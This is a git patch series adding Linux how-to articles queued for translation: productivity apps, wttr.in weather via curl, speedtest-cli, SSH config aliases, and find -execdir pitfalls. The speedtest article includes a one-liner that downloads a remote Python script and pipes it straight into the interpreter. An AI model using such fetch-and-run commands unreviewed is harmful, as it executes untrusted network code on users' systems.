+10 Free Linux Productivity Apps You Haven’t Heard Of
+======
+
+![](https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-00-Featured.jpg)
+
+Productivity apps can really make your work easier. If you are a Linux user, these 10 lesser-known free productivity apps for the Linux desktop can help you.. As a matter of fact, it's possible keen Linux users have heard of all the apps on the list, but for somebody who hasn't gone beyond the main apps, these should be unknown.
+
+### 1. Tomboy/Gnote
+
+![linux-productivity-apps-01-tomboy][1]
+
+[Tomboy][2] is a simple note-taking app. It's not for Linux only - you can get it for Unix, Windows, and macOS, too. Tomboy is pretty straightforward to use - you write a note, choose whether to make it sticky on your desktop, and delete it when you are done with it.
+
+### 2. MyNotex
+
+![linux-productivity-apps-02-mynotex][3]
+
+If you want a note-taker with more features but still prefer a small and simple app rather than a huge suite, check [MyNotex][4]. In addition to simple note taking and retrieval, it comes with some nice perks, such as formatting abilities, keyboard shortcuts, and attachments, to name a few. You can also use it as a picture manager.
+
+### 3. Trojitá
+
+![linux-productivity-apps-03-trojita][5]
+
+Though you can live without a desktop email client, if you are used to having one, out of the dozens that are available, try [Trojita][6]. It's good for productivity because it is a fast and lightweight email client, yet it offers all the basics (and more) a good email client must have.
+
+### 4. Kontact
+
+![linux-productivity-apps-04-kontact][7]
+
+A Personal Information Manager (PIM) is a great productivity tool. My personal preferences go to [Kontact][8]. Even though it hasn't been updated in years, it's still a very useful PIM tool to manage emails, address books, calendars, tasks, news feeds, etc. Kontact is a KDE native, but you can use it with other desktops as well.
+
+### 5. Osmo
+
+![linux-productivity-apps-05-osmo][9]
+
+[Osmo][10] is a much more up-to-date app with calendar, tasks, contacts, and notes functionality. It comes with some perks, such as encrypted private data backup and address locations on the map, as well as great search capabilities for notes, tasks, contacts, etc.
+
+### 6. Catfish
+
+![linux-productivity-apps-06-catfish][11]
+
+You can't be productive without a good searching tool. [Catfish][12] is one of the must-try search tools. It's a GTK+ tool and is very fast and lightweight. Catfish uses autocompletion from Zeitgeist, and you can also filter results by date and type.
+
+### 7. KOrganizer
+
+![linux-productivity-apps-07-korganizer][13]
+
+[KOrganizer][14] is the calendar and scheduling component of the Kontact app I mentioned above. If you don't need a full-fledged PIM app but only calendar and scheduling, you can go with KOrganizer instead. KOrganizer offers quick ToDo and quick event entry, as well as attachments for events and todos.
+
+### 8. Evolution
+
+![linux-productivity-apps-08-evolution][15]
+
+If you are not a fan of KDE apps but still you need a good PIM, try GNOME's [Evolution][16]. Evolution is not exactly a less popular app you haven't heard of, but since it's useful, it made the list. Maybe you've heard about Evolution as an email client ,but it's much more than this - you can use it to manage calendars, mail, address books and tasks.
+
+### 9. Freeplane
+
+![linux-productivity-apps-09-freeplane][17]
+
+I don't know if many of you use mind-mapping software on a daily basis, but if you do, check [Freeplane][18]. This is a free mind mapping and knowledge management software you can use for business or fun. You create notes, arrange them in clouds or charts, set tasks with calendars and reminders, etc.
+
+### 10. Calligra Flow
+
+![linux-productivity-apps-10-calligra-flow][19]
+
+Finally, if you need a flowchart and diagramming tool, try [Calligra Flow][20]. Think of it as the open source [alternative of Microsoft Visio][21], though Calligra Flow doesn't offer all the perks Visio offers. Still, you can use it to create network diagrams, organization charts, flowcharts and more.
+
+Productivity tools not only speed up work, but they also make you more organized. I bet there is hardly a person who doesn't use productivity tools in some form. Trying the apps listed here could make you more productive and could make your life at least a bit easier
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/free-linux-productivity-apps-you-havent-heard-of/
+
+作者:[Ada Ivanova][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/adaivanoff/
+[1]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-01-Tomboy.png (linux-productivity-apps-01-tomboy)
+[2]:https://wiki.gnome.org/Apps/Tomboy
+[3]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-02-MyNotex.jpg (linux-productivity-apps-02-mynotex)
+[4]:https://sites.google.com/site/mynotex/
+[5]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-03-Trojita.jpg (linux-productivity-apps-03-trojita)
+[6]:http://trojita.flaska.net/
+[7]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-04-Kontact.jpg (linux-productivity-apps-04-kontact)
+[8]:https://userbase.kde.org/Kontact
+[9]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-05-Osmo.jpg (linux-productivity-apps-05-osmo)
+[10]:http://clayo.org/osmo/
+[11]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-06-Catfish.png (linux-productivity-apps-06-catfish)
+[12]:http://www.twotoasts.de/index.php/catfish/
+[13]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-07-KOrganizer.jpg (linux-productivity-apps-07-korganizer)
+[14]:https://userbase.kde.org/KOrganizer
+[15]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-08-Evolution.jpg (linux-productivity-apps-08-evolution)
+[16]:https://help.gnome.org/users/evolution/3.22/intro-main-window.html.en
+[17]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-09-Freeplane.jpg (linux-productivity-apps-09-freeplane)
+[18]:https://www.freeplane.org/wiki/index.php/Home
+[19]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-10-Calligra-Flow.jpg (linux-productivity-apps-10-calligra-flow)
+[20]:https://www.calligra.org/flow/
+[21]:https://www.maketecheasier.com/5-best-free-alternatives-to-microsoft-visio/
From fe972b99260d7fae07e529aa5b8fc58884cdbad8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:45:31 +0800
Subject: [PATCH 018/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Get=20Your=20Weat?=
=?UTF-8?q?her=20Forecast=20From=20the=20Linux=20CLI?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...our Weather Forecast From the Linux CLI.md | 140 ++++++++++++++++++
1 file changed, 140 insertions(+)
create mode 100644 sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
diff --git a/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md b/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
new file mode 100644
index 0000000000..07547654cf
--- /dev/null
+++ b/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
@@ -0,0 +1,140 @@
+translating by lujun9972
+Get Your Weather Forecast From the Linux CLI
+======
+
+### Objective
+
+Display the current weather forecast in the Linux command line.
+
+### Distributions
+
+This will work on any Linux distribution.
+
+### Requirements
+
+A working Linux install with an Internet connection.
+
+### Difficulty
+
+Easy
+
+### Conventions
+
+ * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
+ * **$** \- given command to be executed as a regular non-privileged user
+
+
+
+### Introduction
+
+It's be convenient to be able to retrieve the latest weather forecast right from your terminal without opening up a web browser, wouldn't it? What about scripting it or setting a cron job? Well, you can.
+
+`http://wttr.in` is a website that allows you to search for weather forecasts anywhere in the world, and it displays he results in ASCII characters. By using `cURL`, you can access `http://wttr.in`, you can get your results directly in the terminal.
+
+### Get Your Local Weather
+
+
+
+![Local weather from wttr.in][1]
+It's really simple to grab your local weather. `wttr.in` will automatically try to detect your location based on your IP address. It's reasonably accurate, unless you're using a VPN, of course.
+```
+
+$ curl wttr.in
+
+```
+
+### Get Weather By City
+
+
+
+![Weather by city from wttr.in][2]
+Now, if you would like the weather in a different city, you can specify that with a slash at the end of `wttr.in`. Replace any spaces in the name with a `+`.
+```
+
+$ curl wttr.in/New+York
+
+```
+
+You can also specify cities the way they're written in Unix timezones.
+```
+
+$ curl wttr.in/New_York
+
+```
+
+Don't use spaces unless you like strange and inaccurate results.
+
+### Get Weather By Airport
+
+
+
+![Weather by airport from wttr.in][3]
+If you're familiar with the three letter airport codes in your area, you can use those too. They might be closer to you and more accurate than the city in general.
+```
+
+$ curl wttr.in/JFK
+
+```
+
+### Best Guess
+
+
+
+![Weather by landmark from wttr.in][4]
+You can have `wttr.in` take a guess on the weather base on a landmark using the `~` character.
+```
+
+$ curl wttr.in/~Statue+Of+Liberty
+
+```
+
+### Weather From A Domain Name
+
+
+
+![Weather by domain name from wttr.in][5]
+Did you ever wonder what the weather is like where LinuxConfig is hosted? Now, now you can find out! `wttr.in` can check weather by domain name. Sure, it's probably not the most useful feature, but it's still interesting none the less.
+```
+
+$ curl wttr.in/@linuxconfig.org
+
+```
+
+### Changing The Temperature Units
+
+
+
+![Change unit system in wttr.in][6]
+By default, `wttr.in` will display temperatures in the units(C or F) used in your actual location. Basically, in States, you'll get Fahrenheit, and everyone else will see Celsius. You can change that by adding `?u` to see Fahrenheit or `?m` to see Celsius.
+```
+
+$ curl wttr.in/New_York?m
+
+$ curl wttr.in/Toronto?u
+
+```
+
+There's an odd bug with ZSH that prevents this from working, so you need to use Bash if you want to convert the units.
+
+### Closing Thoughts
+
+You can easily incorporate a call to `wttr.in` into a script, cron job, or even your MOTD. Of course, you don't need to get that involved. You can just lazily type a call in to this awesome service whenever you want to check the forecast.
+
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/get-your-weather-forecast-from-the-linux-cli
+
+作者:[Nick Congleton][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
+[1]:https://linuxconfig.org/images/wttr-local.jpg
+[2]:https://linuxconfig.org/images/wttr-city.jpg
+[3]:https://linuxconfig.org/images/wttr-airport.jpg
+[4]:https://linuxconfig.org/images/wttr-landmark.jpg
+[5]:https://linuxconfig.org/images/wttr-url.jpg
+[6]:https://linuxconfig.org/images/wttr-units.jpg
From 94c5a5ec7aed26a826241c5097ef06c2651983b5 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:53:04 +0800
Subject: [PATCH 019/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20test?=
=?UTF-8?q?=20internet=20speed=20in=20Linux=20terminal?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...o test internet speed in Linux terminal.md | 175 ++++++++++++++++++
1 file changed, 175 insertions(+)
create mode 100644 sources/tech/20171010 How to test internet speed in Linux terminal.md
diff --git a/sources/tech/20171010 How to test internet speed in Linux terminal.md b/sources/tech/20171010 How to test internet speed in Linux terminal.md
new file mode 100644
index 0000000000..73e0a7f236
--- /dev/null
+++ b/sources/tech/20171010 How to test internet speed in Linux terminal.md
@@ -0,0 +1,175 @@
+How to test internet speed in Linux terminal
+======
+Learn how to use speedtest cli tool to test internet speed in Linux terminal. Also includes one liner python command to get speed details right away.
+
+![test internet speed in linux terminal][1]
+
+Most of us check the internet bandwidth speed whenever we connect to new network or wifi. So why not our servers! Here is a tutorial which will walk you through to test internet speed in Linux terminal.
+
+Everyone of us generally uses [Speedtest by Ookla][2] to check internet speed. Its pretty simple process for a desktop. Goto their website and just click GO button. It will scans your location and speed test with nearest server. If you are on mobile, they have their app for you. But if you are on terminal with command line interface things are little different. Lets see how to check internet speed from Linux terminal.
+
+If you want to speed check only once and dont want to download tool on server, jump here and see one liner command.
+
+### Step 1 : Download speedtest cli tool
+
+First of all, you have to download speedtest CLI tool from [github repository][3]. Now a days, its also included in many well known Linux repositories as well. If its their in yours then you can directly [install that package on your Linux distro][4].
+
+Lets proceed with Github download and install process. [Install git package][4] depending on your distro. Then clone Github repo of speedtest like belwo :
+
+```
+[root@kerneltalks ~]# git clone https://github.com/sivel/speedtest-cli.git
+Cloning into 'speedtest-cli'...
+remote: Counting objects: 913, done.
+remote: Total 913 (delta 0), reused 0 (delta 0), pack-reused 913
+Receiving objects: 100% (913/913), 251.31 KiB | 143.00 KiB/s, done.
+Resolving deltas: 100% (518/518), done.
+
+```
+
+It will be cloned to your present working directory. New directory named `speedtest-cli` will be created. You can see below files in it.
+
+```
+[root@kerneltalks ~]# cd speedtest-cli
+[root@kerneltalks speedtest-cli]# ll
+total 96
+-rw-r--r--. 1 root root 1671 Oct 7 16:55 CONTRIBUTING.md
+-rw-r--r--. 1 root root 11358 Oct 7 16:55 LICENSE
+-rw-r--r--. 1 root root 35 Oct 7 16:55 MANIFEST.in
+-rw-r--r--. 1 root root 5215 Oct 7 16:55 README.rst
+-rw-r--r--. 1 root root 20 Oct 7 16:55 setup.cfg
+-rw-r--r--. 1 root root 3196 Oct 7 16:55 setup.py
+-rw-r--r--. 1 root root 2385 Oct 7 16:55 speedtest-cli.1
+-rw-r--r--. 1 root root 1200 Oct 7 16:55 speedtest_cli.py
+-rwxr-xr-x. 1 root root 47228 Oct 7 16:55 speedtest.py
+-rw-r--r--. 1 root root 333 Oct 7 16:55 tox.ini
+```
+
+The python script `speedtest.py` is the one we will be using to check internet speed.
+
+You can link this script for a command in /usr/bin so that all users on server can use it. Or you can even create [command alias][5] for it and it will be easy for all users to use it.
+
+### Step 2 : Run python script
+
+Now, run python script without any argument and it will search nearest server and test your internet speed.
+
+```
+[root@kerneltalks speedtest-cli]# python speedtest.py
+Retrieving speedtest.net configuration...
+Testing from Amazon (35.154.184.126)...
+Retrieving speedtest.net server list...
+Selecting best server based on ping...
+Hosted by Spectra (Mumbai) [1.15 km]: 8.174 ms
+Testing download speed................................................................................
+Download: 548.13 Mbit/s
+Testing upload speed................................................................................................
+Upload: 323.95 Mbit/s
+```
+
+Oh! Dont amaze with speed. 😀 I am on [AWS EC2 Linux server][6]. Thats the bandwidth of Amazon data center! 🙂
+
+### Different options with script
+
+Few options which might be useful are as below :
+
+ **To search speedtest servers** nearby your location use `--list` switch and `grep` for your location name.
+
+```
+[root@kerneltalks speedtest-cli]# python speedtest.py --list | grep -i mumbai
+ 2827) Bharti Airtel Ltd (Mumbai, India) [1.15 km]
+ 8978) Spectra (Mumbai, India) [1.15 km]
+ 4310) Hathway Cable and Datacom Ltd (Mumbai, India) [1.15 km]
+ 3315) Joister Broadband (Mumbai, India) [1.15 km]
+ 1718) Vodafone India (Mumbai, India) [1.15 km]
+ 6454) YOU Broadband India Pvt Ltd. (Mumbai, India) [1.15 km]
+ 9764) Railtel Corporation of india Ltd (Mumbai, India) [1.15 km]
+ 9584) Sheng Li Telecom (Mumbai, India) [1.15 km]
+ 7605) Idea Cellular Ltd. (Mumbai, India) [1.15 km]
+ 8122) Sify Technologies Ltd (Mumbai, India) [1.15 km]
+ 9049) I-ON (Mumbai, India) [1.15 km]
+ 6403) YOU Broadband India Pvt Ltd., Mumbai (Mumbai, India) [1.15 km]
+```
+
+You can see here, first column is server identifier followed by name of company hosting that server, location and finally its distance from your location.
+
+ **To test internet speed using specific server** use `--server` switch and server identifier from previous output as argument.
+
+```
+[root@kerneltalks speedtest-cli]# python speedtest.py --server 2827
+Retrieving speedtest.net configuration...
+Testing from Amazon (35.154.184.126)...
+Retrieving speedtest.net server list...
+Selecting best server based on ping...
+Hosted by Bharti Airtel Ltd (Mumbai) [1.15 km]: 13.234 ms
+Testing download speed................................................................................
+Download: 93.47 Mbit/s
+Testing upload speed................................................................................................
+Upload: 69.25 Mbit/s
+```
+
+**To get share link of your speed test** , use `--share` switch. It will give you URL of your test hosted on speedtest website. You can share this URL.
+
+```
+[root@kerneltalks speedtest-cli]# python speedtest.py --share
+Retrieving speedtest.net configuration...
+Testing from Amazon (35.154.184.126)...
+Retrieving speedtest.net server list...
+Selecting best server based on ping...
+Hosted by Spectra (Mumbai) [1.15 km]: 7.471 ms
+Testing download speed................................................................................
+Download: 621.00 Mbit/s
+Testing upload speed................................................................................................
+Upload: 367.37 Mbit/s
+Share results: http://www.speedtest.net/result/6687428141.png
+
+```
+
+Observe last line which includes URL of your test result. If I download that image its the one below :
+
+![Speedtest result on Linux][7]
+
+Thats it! But hey if you dont want all this technical jargon, you can even use below one liner to get speed test done right away.
+
+### Internet speed test using one liner in terminal
+
+We are going to use [curl tool ][8]to fetch above said python script online and supply it to python for execution on the go!
+
+```
+[root@kerneltalks ~]# curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
+```
+
+Above command will run the script and show you result on screen!
+
+```
+[root@kerneltalks speedtest-cli]# curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
+Retrieving speedtest.net configuration...
+Testing from Amazon (35.154.184.126)...
+Retrieving speedtest.net server list...
+Selecting best server based on ping...
+Hosted by Spectra (Mumbai) [1.15 km]: 12.599 ms
+Testing download speed................................................................................
+Download: 670.88 Mbit/s
+Testing upload speed................................................................................................
+Upload: 355.84 Mbit/s
+```
+
+I tested this tool on RHEL 7 server but process is same on Ubuntu, Debian, Fedora or CentOS.
+
+--------------------------------------------------------------------------------
+
+via: https://kerneltalks.com/tips-tricks/how-to-test-internet-speed-in-linux-terminal/
+
+作者:[Shrikant Lavhate][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://kerneltalks.com
+[1]:https://c1.kerneltalks.com/wp-content/uploads/2017/10/check-internet-speed-from-Linux.png
+[2]:http://www.speedtest.net/
+[3]:https://github.com/sivel/speedtest-cli
+[4]:https://kerneltalks.com/tools/package-installation-linux-yum-apt/
+[5]:https://kerneltalks.com/commands/command-alias-in-linux-unix/
+[6]:https://kerneltalks.com/howto/install-ec2-linux-server-aws-with-screenshots/
+[7]:https://c3.kerneltalks.com/wp-content/uploads/2017/10/speedtest-on-linux.png
+[8]:https://kerneltalks.com/tips-tricks/4-tools-download-file-using-command-line-linux/
From 7b4244b78217fd348fed0bcfcb91bbb232d4c7ef Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:58:02 +0800
Subject: [PATCH 020/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=205=20SSH=20alias?=
=?UTF-8?q?=20examples=20in=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20171016 5 SSH alias examples in Linux.md | 192 ++++++++++++++++++
1 file changed, 192 insertions(+)
create mode 100644 sources/tech/20171016 5 SSH alias examples in Linux.md
diff --git a/sources/tech/20171016 5 SSH alias examples in Linux.md b/sources/tech/20171016 5 SSH alias examples in Linux.md
new file mode 100644
index 0000000000..ddf92f1cc0
--- /dev/null
+++ b/sources/tech/20171016 5 SSH alias examples in Linux.md
@@ -0,0 +1,192 @@
+5 SSH alias examples in Linux
+======
+[![][1]][1]
+
+As a Linux user, we use[ ssh command][2] to log in to remote machines. The more you use ssh command, the more time you are wasting in typing some significant commands. We can use either [alias defined in your .bashrc file][3] or functions to minimize the time you spend on CLI. But this is not a better solution. The better solution is to use **SSH-alias** in ssh config file.
+
+A couple of examples where we can better the ssh commands we use.
+
+Connecting to ssh to AWS instance is a pain. Just to type below command, every time is complete waste your time as well.
+
+to
+```
+ssh aws1
+```
+
+Connecting to a system when debugging.
+
+to
+```
+ssh xyz
+```
+
+In this post, we will see how to achieve shorting of your ssh commands without using bash alias or functions. The main advantage of ssh alias is that all your ssh command shortcuts are stored in a single file and easy to maintain. The other advantage is we can use same alias **for both SSH and SCP commands alike**.
+
+Before we jump into actual configurations, we should know difference between /etc/ssh/ssh_config, /etc/ssh/sshd_config, and ~/.ssh/config files. Below is the explanation for these files.
+
+## Difference between /etc/ssh/ssh_config and ~/.ssh/config
+
+System-level SSH configurations are stored in /etc/ssh/ssh_config. Whereas user-level ssh configurations are stored in ~/.ssh/config file.
+
+## Difference between /etc/ssh/ssh_config and /etc/ssh/sshd_config
+
+System-level SSH configurations are stored in /etc/ssh/ssh_config. Whereas system level SSH server configurations are stored in /etc/ssh/sshd_config file.
+
+## **Syntax for configuration in ~/.ssh/config file**
+
+Syntax for ~/.ssh/config file content.
+```
+config val
+config val1 val2
+```
+
+**Example1:** Create SSH alias for a host(www.linuxnix.com)
+
+Edit file ~/.ssh/config with following content
+```
+Host tlj
+ User root
+ HostName 18.197.176.13
+ port 22
+```
+
+Save the file
+
+The above ssh alias uses
+
+ 1. **tlj as an alias name**
+ 2. **root as a user who will log in**
+ 3. **18.197.176.13 as hostname IP address**
+ 4. **22 as a port to access SSH service.**
+
+
+
+Output:
+```
+sanne@Surendras-MacBook-Pro:~ > ssh tlj
+Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-93-generic x86_64)
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+ Get cloud support with Ubuntu Advantage Cloud Guest:
+ http://www.ubuntu.com/business/services/cloud
+Last login: Sat Oct 14 01:00:43 2017 from 20.244.25.231
+root@linuxnix:~# exit
+logout
+Connection to 18.197.176.13 closed.
+```
+
+**Example2:** Using ssh key to login to the system without using password using **IdentityFile**.
+
+Example:
+```
+Host aws
+ User ec2-users
+ HostName ec2-54-200-184-202.us-west-2.compute.amazonaws.com
+ IdentityFile ~/Downloads/surendra.pem
+ port 22
+```
+
+**Example3:** Use a different alias for the same host. In below example, we use **tlj, linuxnix, linuxnix.com** for same IP/hostname 18.197.176.13.
+
+~/.ssh/config file content
+```
+Host tlj linuxnix linuxnix.com
+ User root
+ HostName 18.197.176.13
+ port 22
+```
+
+**Output:**
+```
+sanne@Surendras-MacBook-Pro:~ > ssh tlj
+Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-93-generic x86_64)
+* Documentation: https://help.ubuntu.com
+* Management: https://landscape.canonical.com
+* Support: https://ubuntu.com/advantage
+Get cloud support with Ubuntu Advantage Cloud Guest:
+http://www.ubuntu.com/business/services/cloud
+Last login: Sat Oct 14 01:00:43 2017 from 220.244.205.231
+root@linuxnix:~# exit
+logout
+Connection to 18.197.176.13 closed.
+sanne@Surendras-MacBook-Pro:~ > ssh linuxnix.com
+Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-93-generic x86_64)
+* Documentation: https://help.ubuntu.com
+* Management: https://landscape.canonical.com
+* Support: https://ubuntu.com/advantage
+```
+```
+Get cloud support with Ubuntu Advantage Cloud Guest:
+http://www.ubuntu.com/business/services/cloud
+Last login: Sun Oct 15 20:31:08 2017 from 1.129.110.13
+root@linuxnix:~# exit
+logout
+Connection to 138.197.176.103 closed.
+[6571] sanne@Surendras-MacBook-Pro:~ > ssh linuxnix
+Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-93-generic x86_64)
+* Documentation: https://help.ubuntu.com
+* Management: https://landscape.canonical.com
+* Support: https://ubuntu.com/advantage
+Get cloud support with Ubuntu Advantage Cloud Guest:
+http://www.ubuntu.com/business/services/cloud
+Last login: Sun Oct 15 20:31:20 2017 from 1.129.110.13
+root@linuxnix:~# exit
+logout
+Connection to 18.197.176.13 closed.
+```
+
+**Example4:** Copy a file to remote system using same SSH alias
+
+Syntax:
+```
+**scp :**
+```
+
+Example:
+```
+sanne@Surendras-MacBook-Pro:~ > scp abc.txt tlj:/tmp
+abc.txt 100% 12KB 11.7KB/s 00:01
+sanne@Surendras-MacBook-Pro:~ >
+```
+
+As we already set ssh host as an alias, using SCP is a breeze as both ssh and SCP use almost same syntax and options.
+
+To do scp a file from local machine to remote one use below.
+
+**Examaple5:** Resolve SSH timeout issues in Linux. By default, your ssh logins are timed out if you don 't activily use the terminial.
+
+[SSH timeouts][5] are one more pain where you have to re-login to a remote machine after a certain time. We can set SSH time out right in side your ~/.ssh/config file to make your session active for whatever time you want. To achieve this we will use two SSH options for keeping the session alive. One ServerAliveInterval keeps your session live for number of seconds and ServerAliveCountMax will initial session after session for a given number.
+```
+**ServerAliveInterval A**
+**ServerAliveCountMax B**
+```
+
+**Example:**
+```
+Host tlj linuxnix linuxnix.com
+ User root
+ HostName 18.197.176.13
+ port 22
+ ServerAliveInterval 60**
+ ServerAliveCountMax 30
+```
+
+We will see some other exiting howto in our next post. Keep visiting linuxnix.com.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxnix.com/5-ssh-alias-examples-using-ssh-config-file/
+
+作者:[Surendra Anne;Max Ntshinga;Otto Adelfang;Uchechukwu Okeke][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxnix.com
+[1]:https://www.linuxnix.com/wp-content/uploads/2017/10/SSH-alias-1.png
+[2]:https://www.linuxnix.com/ssh-access-remote-linux-server/
+[3]:https://www.linuxnix.com/linux-alias-command-explained-with-examples/
+[4]:/cdn-cgi/l/email-protection
+[5]:https://www.linuxnix.com/how-to-auto-logout/
From 19ab2010636fe71e650b4a090777ce0e64b87d15 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:59:54 +0800
Subject: [PATCH 021/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Using=20the=20Lin?=
=?UTF-8?q?ux=20find=20command=20with=20caution?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ing the Linux find command with caution.md | 93 +++++++++++++++++++
1 file changed, 93 insertions(+)
create mode 100644 sources/tech/20171016 Using the Linux find command with caution.md
diff --git a/sources/tech/20171016 Using the Linux find command with caution.md b/sources/tech/20171016 Using the Linux find command with caution.md
new file mode 100644
index 0000000000..2093308d9f
--- /dev/null
+++ b/sources/tech/20171016 Using the Linux find command with caution.md
@@ -0,0 +1,93 @@
+Using the Linux find command with caution
+======
+![](https://images.idgesg.net/images/article/2017/10/caution-sign-100738884-large.jpg)
+A friend recently reminded me of a useful option that can add a little caution to the commands that I run with the Linux find command. It's called -ok and it works like the -exec option except for one important difference -- it makes the find command ask for permission before taking the specified action.
+
+Here's an example. If you were looking for files that you intended to remove from the system using find, you might run a command like this:
+```
+$ find . -name runme -exec rm {} \;
+
+```
+
+Anywhere within the current directory and its subdirectories, any files named "runme" would be summarily removed -- provided, of course, you have permission to remove them. Use the -ok command instead, and you'll see something like this. The find command will ask for approval before removing the files. Answering **y** for "yes" would allow the find command to go ahead and remove the files one by one.
+```
+$ find . -name runme -ok rm {} \;
+< rm ... ./bin/runme > ?
+
+```
+
+### The -exedir command is also an option
+
+Another option that can be used to modify the behavior of the find command and potentially make it more controllable is the -execdir command. Where -exec runs whatever command is specified, -execdir runs the specified command from the directory in which the located file resides rather than from the directory in which the find command is run. Here's an example of how it works:
+```
+$ pwd
+/home/shs
+$ find . -name runme -execdir pwd \;
+/home/shs/bin
+
+```
+```
+$ find . -name runme -execdir ls \;
+ls rm runme
+
+```
+
+So far, so good. One important thing to keep in mind, however, is that the -execdir option will also run commands from the directories in which the located files reside. If you run the command shown below and the directory contains a file named "ls", it will run that file and it will run it even if the file does _not_ have execute permissions set. Using **-exec** or **-execdir** is similar to running a command by sourcing it.
+```
+$ find . -name runme -execdir ls \;
+Running the /home/shs/bin/ls file
+
+```
+```
+$ find . -name runme -execdir rm {} \;
+This is an imposter rm command
+
+```
+```
+$ ls -l bin
+total 12
+-r-x------ 1 shs shs 25 Oct 13 18:12 ls
+-rwxr-x--- 1 shs shs 36 Oct 13 18:29 rm
+-rw-rw-r-- 1 shs shs 28 Oct 13 18:55 runme
+
+```
+```
+$ cat bin/ls
+echo Running the $0 file
+$ cat bin/rm
+echo This is an imposter rm command
+
+```
+
+### The -okdir option also asks for permission
+
+To be more cautious, you can use the **-okdir** option. Like **-ok** , this option will prompt for permission to run the command.
+```
+$ find . -name runme -okdir rm {} \;
+< rm ... ./bin/runme > ?
+
+```
+
+You can also be careful to specify the commands you want to run with full paths to avoid any problems with imposter commands like those shown above.
+```
+$ find . -name runme -execdir /bin/rm {} \;
+
+```
+
+The find command has a lot of options besides the default print. Some can make your file searching more precise, but a little caution is always a good idea.
+
+Join the Network World communities on [Facebook][1] and [LinkedIn][2] to comment on topics that are top of mind.
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3233305/linux/using-the-linux-find-command-with-caution.html
+
+作者:[Sandra Henry-Stocker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
+[1]:https://www.facebook.com/NetworkWorld/
+[2]:https://www.linkedin.com/company/network-world
From 43da04da8385cef6f40d8db09fb79901ab931a86 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:02:43 +0800
Subject: [PATCH 022/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20Are=20the?=
=?UTF-8?q?=20Hidden=20Files=20in=20my=20Linux=20Home=20Directory=20For=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...en Files in my Linux Home Directory For.md | 61 +++++++++++++++++++
1 file changed, 61 insertions(+)
create mode 100644 sources/tech/20171017 What Are the Hidden Files in my Linux Home Directory For.md
diff --git a/sources/tech/20171017 What Are the Hidden Files in my Linux Home Directory For.md b/sources/tech/20171017 What Are the Hidden Files in my Linux Home Directory For.md
new file mode 100644
index 0000000000..fa8613f03d
